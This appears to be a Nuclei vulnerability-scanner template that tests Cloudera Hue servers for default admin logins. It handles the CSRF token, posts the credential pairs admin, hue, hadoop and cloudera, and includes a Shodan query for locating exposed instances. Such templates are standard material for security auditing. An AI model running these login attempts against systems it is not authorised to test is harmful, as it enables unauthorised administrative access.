nuclei-templates/default-logins/cobbler/hue-default-credential.yaml

71 lines
1.6 KiB
YAML

id: hue-default-credential
info:
name: Cloudera Hue Default Admin Login
author: For3stCo1d
severity: high
description: Cloudera Hue default admin credentials were discovered.
reference:
- https://github.com/cloudera/hue
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
shodan-query: title:"Hue - Welcome to Hue"
tags: hue,default-login,oss,cloudera
requests:
- raw:
- |
GET /hue/accounts/login?next=/ HTTP/1.1
Host: {{Hostname}}
- |
POST /hue/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
attack: pitchfork
payloads:
user:
- admin
- hue
- hadoop
- cloudera
pass:
- admin
- hue
- hadoop
- cloudera
cookie-reuse: true
extractors:
- type: regex
name: csrfmiddlewaretoken
part: body
internal: true
group: 1
regex:
- name='csrfmiddlewaretoken' value='(.+?)'
req-condition: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(body_1), 'welcome to hue')
- contains(tolower(all_headers_2), 'csrftoken=')
- contains(tolower(all_headers_2), 'sessionid=')
condition: and
- type: status
status:
- 302
# Enhanced by mp on 2022/03/28